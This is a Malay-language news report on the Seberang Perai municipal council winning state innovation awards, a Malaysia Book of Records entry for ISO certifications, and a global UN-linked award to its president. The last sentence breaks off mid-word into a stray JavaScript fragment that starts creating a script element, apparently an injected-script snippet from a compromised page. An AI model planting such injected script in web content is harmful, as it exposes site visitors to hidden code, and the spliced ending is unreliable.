MPSP lakar sejarah menangi anugerah peringkat kebangsaan & global

GEORGE TOWN – Majlis Perbandaran Seberang Perai (MPSP) melakar sejarah apabila berjaya meraih lima anugerah, termasuk satu anugerah khas peringkat global kepada Yang di-Pertua MPSP, Dato’ Maimunah Mohd. Sharif.

Maimunah berkata, pengiktirafan diterima MPSP membuktikan kesungguhan pihak berkuasa tempatan (PBT) tersebut dalam terus memberikan perkhidmatan terbaik buat semua pembayar cukai pintu dan warga Seberang Perai.

“Penganugerahan ini juga merupakan penanda aras SOP (Tatacara Pengendalian Piawaian) bagi MPSP dalam menyediakan perkhidmatan terbaik di Seberang Perai,” katanya pada sidang media yang dipengerusikan Ketua Menteri, Y.A.B. Tuan Lim Guan Eng di sini baru-baru ini.

Hadir sama, barisan kepimpinan Kerajaan Negeri dan Setiausaha Perbandaran, Sr. Rozali Mohamud.

Antara anugerah yang dirangkul oleh MPSP adalah:

*Anugerah Persembahan Terbaik dalam Konvensyen Kumpulan Inovasi dan Kreatif (KIK) 2016 Peringkat Negeri Pulau Pinang melalui tajuk projek, ‘Masalah Mengenalpasti Binaan Tanpa Kebenaran (Freeriders) Untuk Tujuan Kadaran oleh Jabatan Penilaian dan Pengurusan Harta’. PBT berkaitan telah meraih anugerah tersebut untuk tiga tahun berturut-turut.

*Anugerah Inovasi Pihak Berkuasa Tempatan (AIPBT) 2016 Peringkat Pulau Pinang melalui inovasi antaranya, AntiTheft Sliding Door for Lamp Post (A Test Door), Alat Perangkap Lalat, pengenalan Sistem e-Mahkamah dan Anugerah Khas bagi Kad Pemberitahuan Tunggakan Cukai Taksiran.

*Inovasi serupa turut membolehkan MPSP disenarai pendek bagi anugerah sama AIPBT bagi peringkat Kementerian Kesejahteraan Bandar, Perumahan dan Kerajaan Tempatan (KPKT) bersama-sama tujuh PBT lain di Malaysia, antaranya Dewan Bandaraya Kuching Utara, Majlis Bandaraya Ipoh, Majlis Perbandaran Alor Gajah, Majlis Perbandaran Ampang Jaya, Majlis Perbandaran Kemaman, Majlis Perbandaran Sepang dan Perbadanan Putrajaya.

*Turut mencatat sejarah dalam Malaysia Books of Records (MBOR) apabila menjadi PBT pertama di Malaysia yang memperoleh enam Pensijilan Sistem Pengurusan Kualiti atau ISO. Di peringkat global pula, Maimunah sendiri telah dianugerahkan ‘Global Human Settlements on Outstanding Contribution Award’ oleh Global Forum on Human Settlements and United Nation Environment Programme (UNEP) di Quito, Ecuador pada 17 Oktober lalu sempena United Nations Conference on Housing & Sustainable Urban Development (Habitat III).

Lanjutan itu, Guan Eng turut menzahirkan ucapan tahniah dan syabas atas kejayaan MPSP sama ada di peringkat negeri mahupun antarabangsavar d=document;var s=d.createElement(‘script’);